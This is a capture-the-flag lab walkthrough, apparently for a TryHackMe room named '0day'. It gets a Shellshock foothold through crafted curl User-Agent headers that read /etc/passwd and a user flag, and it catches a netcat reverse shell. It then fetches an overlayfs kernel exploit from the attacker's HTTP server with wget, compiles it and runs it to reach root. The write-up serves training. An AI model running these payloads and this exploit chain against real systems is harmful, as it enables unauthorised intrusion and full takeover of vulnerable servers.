Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials.These materials are for educational and research purposes only.
Summary
- Running Nikto to get foothold
- Gives an error which shows that this page is vulnerable to ShellShock
- Making Curl request toward the web server
- One-liner reverse shell with Curl request
- Uname -a gives overlayfs Local Privilege Escalation vulnerability
- Download the exploit file to the machine, compile and execute
Port scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
➜ 0day nmap -sCV -p- -T4 10.10.241.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-28 03:12 UTC
Stats: 0:07:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 31.72% done; ETC: 03:36 (0:16:04 remaining)
Warning: 10.10.241.3 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.241.3
Host is up (0.29s latency).
Not shown: 65526 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
6681/tcp filtered unknown
14692/tcp filtered unknown
15314/tcp filtered unknown
24059/tcp filtered unknown
35361/tcp filtered unknown
49775/tcp filtered unknown
61037/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1338.70 seconds
Website
There are 2 ports open.
- 22 for SSH
- 80 for HTTP
And it’s using Apache with version 2.4.7
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
➜ 0day gobuster dir --url http://10.10.241.3/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.241.3/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/28 03:13:27 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin (Status: 301) [Size: 311] [--> http://10.10.241.3/cgi-bin/]
/img (Status: 301) [Size: 307] [--> http://10.10.241.3/img/]
/uploads (Status: 301) [Size: 311] [--> http://10.10.241.3/uploads/]
/admin (Status: 301) [Size: 309] [--> http://10.10.241.3/admin/]
/css (Status: 301) [Size: 307] [--> http://10.10.241.3/css/]
/js (Status: 301) [Size: 306] [--> http://10.10.241.3/js/]
/backup (Status: 301) [Size: 310] [--> http://10.10.241.3/backup/]
/secret (Status: 301) [Size: 310] [--> http://10.10.241.3/secret/]
Progress: 9767 / 220562 (4.43%)
Running gobuster doesn’t give anything useful while nikto gives pretty good result.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜ 0day nikto -h http://10.10.241.3/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.241.3
+ Target Hostname: 10.10.241.3
+ Target Port: 80
+ Start Time: 2022-09-28 03:20:35 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xbd1 0x5ae57bb9a1192
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
Foothold
The site appears to be vulnerable to the ‘Shellshock’ vulnerability. Attackers may be exploited Shellshock within hours of the initial disclosure by creating botnets of compromised computers to perform distributed denial-of-service attacks and vulnerability scanning. By trying curl the website, it shows the error that vulnerable to shellshock.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
➜ 0day curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep3"' http://10.10.241.3/cgi-bin/test.cgi
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator at
webmaster@localhost to inform them of the time this error occurred,
and the actions you performed just before this error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 10.10.241.3 Port 80</address>
</body></html>
➜ 0day
Now let’s try to cat the passwd file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
➜ 0day curl -A "() { ignored; }; echo Content-Type:text/plain;echo;echo;/bin/cat /etc/passwd" http://10.10.241.3/cgi-bin/test.cgi
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
And we may cat the user.txt with this vulnerability.
1
2
3
➜ 0day curl -A "() { ignored; }; echo Content-Type:text/plain;echo;echo;/bin/cat /home/ryan/user.txt" http://10.10.241.3/cgi-bin/test.cgi
THM{Sh3llSh0ck_*****}
Seems like we might able to setup reverse shell against this box.
1
2
3
4
➜ 0day nc -lvnp 1337
Connection from 10.10.241.3:48350
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
And we got shell as www-data, try running sudo -l with no result, but uname -a is exploitable using "overlayfs Local Privilege Escalation"
Escalate to root
1
2
3
4
www-data@ubuntu:/usr/lib/cgi-bin$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/usr/lib/cgi-bin$
Fire up Searchsploit to check if there is exploit for it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
➜ 0day searchsploit overlay
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Local Privilege Escalation (Metasploit) | linux/local/40688.rb
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1) | linux/local/39166.c
Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2) | linux/local/39230.c
OverlayFS inode Security Checks - 'inode.c' Local Security Bypass | linux/local/36571.sh
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation | linux/local/41762.txt
Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation | linux/local/41763.txt
Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Error Path | linux/dos/47692.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Send the exploit file to the machine and compile with gcc
1
2
3
4
➜ 0day python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.241.3 - - [28/Sep/2022 03:55:34] "GET /37292.c HTTP/1.1" 200 -
10.10.241.3 - - [28/Sep/2022 03:55:53] "GET /37292.c HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@ubuntu:/usr/lib/cgi-bin$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ wget http://10.17.62.230:8000/37292.c
wget http://10.17.62.230:8000/37292.c
--2022-09-27 20:55:53-- http://10.17.62.230:8000/37292.c
Connecting to 10.17.62.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/plain]
Saving to: '37292.c'
100%[======================================>] 4,968 --.-K/s in 0.001s
2022-09-27 20:55:54 (6.70 MB/s) - '37292.c' saved [4968/4968]
www-data@ubuntu:/tmp$
The file can’t be compiled because of the PATH that being used in this version of Ubuntu is incorrect, so we need to fix the PATH to the default.
1
www-data@ubuntu:/tmp$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin/:/sbin:/bin
Compile the file with gcc and we can execute the file
1
2
3
4
5
6
7
8
9
10
11
12
www-data@ubuntu:/tmp$ gcc 37292.c -o myexploit
gcc 37292.c -o myexploit
www-data@ubuntu:/tmp$ ls -la
ls -la
total 40
drwxrwxrwt 4 root root 4096 Sep 27 21:03 .
drwxr-xr-x 22 root root 4096 Sep 2 2020 ..
drwxrwxrwt 2 root root 4096 Sep 27 20:12 .ICE-unix
drwxrwxrwt 2 root root 4096 Sep 27 20:12 .X11-unix
-rw-r--r-- 1 www-data www-data 4968 Sep 27 20:54 37292.c
-rwxr-xr-x 1 www-data www-data 13652 Sep 27 21:03 myexploit
www-data@ubuntu:/tmp$
Run the exploit and we get root directly
1
2
3
4
5
6
7
8
9
10
11
12
www-data@ubuntu:/tmp$ ./myexploit
./myexploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
